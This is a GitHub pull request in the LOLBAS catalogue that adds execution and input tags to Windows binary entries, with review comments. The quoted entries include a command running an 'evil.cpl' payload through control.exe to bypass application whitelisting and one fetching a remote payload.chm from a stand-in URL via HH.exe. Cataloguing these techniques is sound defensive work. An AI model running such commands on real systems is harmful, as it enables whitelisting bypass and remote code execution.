-
Notifications
You must be signed in to change notification settings - Fork 1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Pull request: Added Execute Tags to most of the LOLBas #405
base: master
Are you sure you want to change the base?
Conversation
Changed tags Execute DLL to Execute .NetDLL Added Execute: .NetEXE tag
Tags added: - .NetObjects - Fixed Format
Added tags - Execute: EXE - Input: Custom Format
Added the following tags: - Execute: EXE - Input: Custom Format
Added tags: - Execute: CMD - Input: Custom format
Added Tags: - Input: CustomFormat
Tags: Changed Input: INF to Execute INF for consistency Inout: Customformat added
Execute and Input Tags added
Added Execution section to Control.exe Added tags: - Input Custom Format
Added Input tag
Added Tags: - Execute EXE - Input Fixed Format
Added Tags: - Execute ClickOnce - Execute Remote - Input Custom Format
Added Tags: - Execute CMD - Input CustomFormat
Added Tags: - Execution: Remote - Input: Custom Format
Added Tags: - Execute EXE - Input: Custom Format
Added Tags: - Input CustomFormat
Added Tags: - Execute EXE - Input: Custom Format
Added Tags: Execute: EXE Input: Fixed Format
Added Tags: - Execute CMD - Input Custom Format
Added Tags: - Execute CMD - Input Fixed Format
Added the command to execute remote CHM files Added Tags
Added Tags: Execute INF Input: Fixed Format
Added Tags Execute EXE Input Fixed Format
Added Tags: Execute .NetEXE Execute Remote Input Custom Format
Added: Execute INF Input Custom Format
Added Tags: Input Custom Format
Added Tags: Execute EXE Execute Remote
Added Tags: Execute Powershell
Added Tags: Execute: Powershell
Added Tags: Execute Nuget Execute Remote
Added Tags: Execute WSH
Added Tags: - Execute: Javascript Execute CMD
Added Tags: Execute Nuget Execute Remote Execute EXE
Added Tags: Execute EXE
Added Tags: Execute EXE
Added Tags: Execute .NetObjects
Added Tags: Execute EXE Execute Remote
Added Tags: Execute: EXE
Added Tags Execute EXE
Added Tags: Execute C#
Added Tags: Execute EXE Execute CMD
Added Tags
This reverts commit 0e177e7.
This reverts commit 0795916.
This reverts commit 679b321.
This reverts commit 8715370.
Also, AWBypass and Execute sections are usually redundant. It could be interesting to add AWBypass as a tag rather than a section |
Update Dfshim.yml: Typo
This is a nice idea, thank you for looking into this and opening a pull request. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I made a couple of small changes, see 089614e - let me know if you are happy with these, then I'll merge the entire PR. Thanks again for your work here, great stuff
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Also, two minor questions
- Command: control.exe c:\windows\tasks\evil.cpl | ||
Description: Execute evil.cpl payload. A CPL is a DLL file with CPlApplet export function) | ||
Usecase: Use to execute code and bypass application whitelisting | ||
Category: Execute | ||
Privileges: User | ||
MitreID: T1218.002 | ||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
Tags: | ||
- Execute: DLL |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Where did this come from?
- Command: HH.exe http://some.url/payload.chm | ||
Description: Executes a remote payload.chm file which can contain commands. | ||
Usecase: Execute commands with HH.exe | ||
Category: Execute | ||
Privileges: User | ||
MitreID: T1218.001 | ||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 | ||
Tags: | ||
- Execute: CMD | ||
- Execute: CHM | ||
- Execute: Remote |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Same here
Hi, I really like the Tags feature and wanted to add tags to see better what type of payload the LOLBas executes.
So I made a commit per LOLBas edited. If you want me to do just 1 big commit I will do another Pull Request
The following can be improved, please tell me if you want me to spend more time on this:
Anyway please tell me how you feel about this.
Regards,
Hegusung